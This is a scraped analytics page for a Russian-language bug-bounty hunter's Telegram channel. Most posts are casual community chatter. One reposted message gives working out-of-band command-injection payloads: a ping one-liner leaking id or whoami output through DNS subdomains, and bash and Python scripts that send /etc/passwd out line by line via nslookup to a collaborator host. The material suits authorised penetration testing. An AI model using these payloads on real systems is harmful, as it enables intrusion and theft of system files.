Your trial period has ended!
For full access to functionality, please pay for a premium subscription
BU
Омский багхантер
https://t.me/bughunter_omsk
Channel age
Created
Language
Japanese
1.21%
ER (week)
8.97%
ERR (week)

По всем вопросам: @arteb123

Messages Statistics
Reposts and citations
Publication networks
Satellites
Contacts
History
Top categories
Main categories of messages will appear here.
Top mentions
The most frequent mentions of people, organizations and places appear here.
Found 17 results
https://cheatsheetseries.owasp.org/Glossary.html
04/20/2025, 21:38
t.me/bughunter_omsk/119
03/21/2025, 19:14
t.me/bughunter_omsk/118
Смотрите что нашел 😏
03/15/2025, 17:08
t.me/bughunter_omsk/117
03/15/2025, 17:08
t.me/bughunter_omsk/116
Добро пожаловать в Омское бб
by @tembitt
03/03/2025, 17:22
t.me/bughunter_omsk/115
Repost
8
2
154
😆 (Не)секретный чатик багхантеров

А вы знаете, что у нашего комьюнити есть чат, в котором общаются исследователи и команда платформы? Там уже больше 250 человек, не хватает только вас!

Залетайте в чат, чтобы:

🔵Общаться с другими хантерами.
🔵Получать помощь и делиться опытом.
🔵Быть на связи с командой платформы.
🔵Оставаться в курсе новостей.
🔵Вместе посещать багбаунти-ивенты.
🔵Делиться мемами и просто болтать о багхантинге.

Присоединяйтесь, будем вместе прокачиваться в работе с уязвимостями ;)
02/28/2025, 12:48
t.me/bughunter_omsk/114
Repost
15
16
216
Встретился тут с ситуацией, когда есть RCE, но вытащить выводы команд можно было только через DNS'ку:


name=val`ping -с 1 $(whoami).collaborator`ue


Получение вывода root в поддомене, конечно, приятно, но хотелось что-то валиднее для PoC'а. Однако, нужно помнить:


Максимальная длина доменного имени, включая поддомены, составляет 253 символа. Однако каждый отдельный уровень домена не может превышать 63 символа.


Поэтому я тут чуть посидел, почитал статейки, сам что-то пописал на баше и получил 2 удобные нагрузки для использования:

Получение части от вывода команды

Логика работы: исполнение команды, обрезание её вывода до диапазона от 1 до 30 символа(далее меняете под себя), после чего это всё кодируется в base64 и отправляется в поддомене


`ping -c 1 $(id | cut -c1-30| base64 | tr -d '=').domain.com`


Чтение всего файла по частям

Логика работы: файл читается построчно, если вся закодированная в base64 строка маленькая(40 символов), то отправляется DNS-запрос с base64 данными в поддомене(перед строкой добавляется L{номер_строки} и дальше уже идут base64 данные). Если строка длиннее, то она отправляется кусками с префиксом для удобства(L{номер_строки}P{какая_часть_от_base64_строки}D и потом данные)


bash -c 'border=40; domain=".collaborator"; delay=3; lineNumber=1; while IFS= read -r line; do encoded=$(echo -n "$line" | base64 | tr -d "="); parts=$(echo "$encoded" | fold -w "$border"); part=1; echo "$parts" | while read -r chunk; do if [ $(echo "$parts" | wc -l) -gt 1 ]; then nslookup "L${lineNumber}P${part}D${chunk}${domain}"; else nslookup "L${lineNumber}${chunk}${domain}"; fi; sleep "$delay"; part=$((part + 1)); done; lineNumber=$((lineNumber + 1)); done < /etc/passwd'


Данный bash я делал по ранее написанному python-коду:


import os, base64, time

border, domain, delay = 40, ".collaborator", 3

with open('/etc/passwd') as file:
for lineNumber, line in enumerate(file, 1):
encoded = base64.b64encode(line.strip().encode()).decode().replace('=', '')
parts = [encoded[i:i+border] for i in range(0, len(encoded), border)]

for part, chunk in enumerate(parts, 1):
os.system(f'nslookup "L{lineNumber}{f"P{part}D" if len(parts) > 1 else ""}{chunk}{domain}"')
time.sleep(delay)


Также попутно хочу поделиться полезными ссылками по этой теме:
- https://notsosecure.com/out-band-exploitation-oob-cheatsheet
- https://github.com/dhmosfunk/DNSEXFIL
- https://gist.github.com/Spix0r/6b38a02be0409ba3679d71c30a6db9a9

P.S. Если base64 не катит, то просто поменяйте на hex
02/18/2025, 17:05
t.me/bughunter_omsk/112
Repost
18
378
02/18/2025, 17:05
t.me/bughunter_omsk/113
Вы же не забыли отправить «валентинки» в багбаунти программы?
02/15/2025, 20:04
t.me/bughunter_omsk/111
12
81
596
Обнаружил хорошую доку по внутреннему пентесту/редтиму. Рокет сайнса здесь нет, но для актуализации знаний прям что надо.

Тоже самое, но только в виде репозитория: тык
02/13/2025, 11:51
t.me/bughunter_omsk/110
Традиционное базированное фото с любимой
02/07/2025, 10:49
t.me/bughunter_omsk/109
02/07/2025, 03:03
t.me/bughunter_omsk/108
Получается, слетал в рабочую командировку на концерт Билана..🫡
02/07/2025, 03:03
t.me/bughunter_omsk/107
Получается, слетал в рабочую командировку на концерт Билана..🫡
02/07/2025, 02:59
t.me/bughunter_omsk/106
16
13
278
02/02/2025, 18:14
t.me/bughunter_omsk/105
Тут кажется DeepSeek протек.
Но это же ведь не повод не загружать туда сорцы с апи ключами? 🧐

Хорошая новость - уязвимость уже закрыли.
Плохая новость - уязвимостью уже мог кто-то воспользоваться.
01/30/2025, 01:20
t.me/bughunter_omsk/104
Если когда-нибудь на стендоффе выйдет багбаунти с Омской областью, то там будет всего одно недопустимое событие - покинуть Омск
01/27/2025, 22:15
t.me/bughunter_omsk/103
Search results are limited to 100 messages.
Some features are available to premium users only.
You need to buy subscription to use them.
Filter
Message type
Similar message chronology:
Newest first
Similar messages not found
Messages
Find similar avatars
Channels 0
High
Title
Subscribers
No results match your search criteria